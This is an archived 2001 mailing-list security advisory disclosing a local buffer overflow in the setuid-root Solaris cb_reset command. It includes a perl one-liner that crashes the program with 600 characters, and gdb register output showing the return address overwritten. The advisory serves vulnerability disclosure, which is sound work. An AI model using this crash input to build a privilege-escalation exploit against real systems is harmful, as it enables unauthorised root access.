Solaris /opt/SUNWssp/bin/cb_reset Vulnerability

From: Pablo Sor (psorat_private)
Date: Wed Jun 20 2001 - 09:30:59 PDT

Next message: ISS XForce: "ISS Security Advisory: Multiple Vendor 802.11b Access Point SNMP authentication flaw"

Previous message: Mayers, Philip J: "RE: [RHSA-2001:078-05] Format string bug fixed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Vulnerability in Solaris /opt/SUNWssp/bin/cb_reset

Date Published: June 12, 2001

Advisory ID: N/A

Bugtraq ID: N/A

CVE CAN: Non currently assigned.

Title: Solaris /opt/SUNWssp/bin/cb_reset Buffer Overflow Vulnerability

Class: Boundary Error Condition

Remotely Exploitable: No

Locally Exploitable: Yes

Vulnerability Description:

A problem with the cb_reset setuid root command included in the SUNWssp package 
(not in the standard install), results in a buffer overflow and potentially 
the execution of arbitraty code.
Due to the insufficient handling of input parameter, a buffer overflow at 600 
characters makes it possible to overwrite variables on the stack including 
the return address.

Vulnerable Packages/Systems:

SunOS 5.8 (have not tested on other version)

Solution/Vendor Information/Workaround:

Sun Microsystems was notified on June 12, 2001. Patches are excepted shortly.

Credits:

This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.

This advisory was drafted with the help of the SecurityFocus.com Vulnerability
Help Team. For more information or assistance drafting advisories please mail
vulnhelpat_private

Technical Description :

$ uname -a
SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10

$ ls /tftpboot/cb_port
/tftpboot/cb_port

$ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
Resetting host
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ether_hostton(SrcHost:laika): No such file or directory
ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA): No such file or directory
Bus Error (core dumped)

$ gdb /opt/SUNWssp/bin/cb_reset --core=core
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)...
Core was generated by `/opt/SUNWssp/bin/cb_reset
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 10, Bus Error.
Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
(no debugging symbols found)...done.
Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
Reading symbols from /opt/SUNWssp/lib/liblogger.so...
(no debugging symbols found)...done.

[...]

Loaded symbols for /usr/lib/nss_files.so.1
#0  0x1219c in cb_send_frame ()
(gdb) info registers
g0             0x0      0
g1             0xff195b80       -15115392
g2             0xff322630       -13490640
g3             0xff332d78       -13423240
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x13278  78456
o1             0xff1bbab8       -14959944
o2             0xff1b8018       -14974952
o3             0x13278  78456
o4             0x13258  78424
o5             0xffbedb71       -4269199
sp             0xffbedb18       -4269288
o7             0x1218c  74124
l0             0xc3c3c3c3       -1010580541
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x4141414d       1094795597
i5             0x41414141       1094795585
fp             0x41414141       1094795585
i7             0x41414141       1094795585  (***)
y              0xb      11
psr            0xfe801001       -25161727
wim            0x0      0
tbr            0x0      0
pc             0x1219c  74140
npc            0x121a0  74144
fpsr           0x0      0      
cpsr           0x0      0
(gdb) 


-- 
Pablo Sor
psorat_private, psorat_private

Next message: ISS XForce: "ISS Security Advisory: Multiple Vendor 802.11b Access Point SNMP authentication flaw"
Previous message: Mayers, Philip J: "RE: [RHSA-2001:078-05] Format string bug fixed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jun 20 2001 - 15:59:08 PDT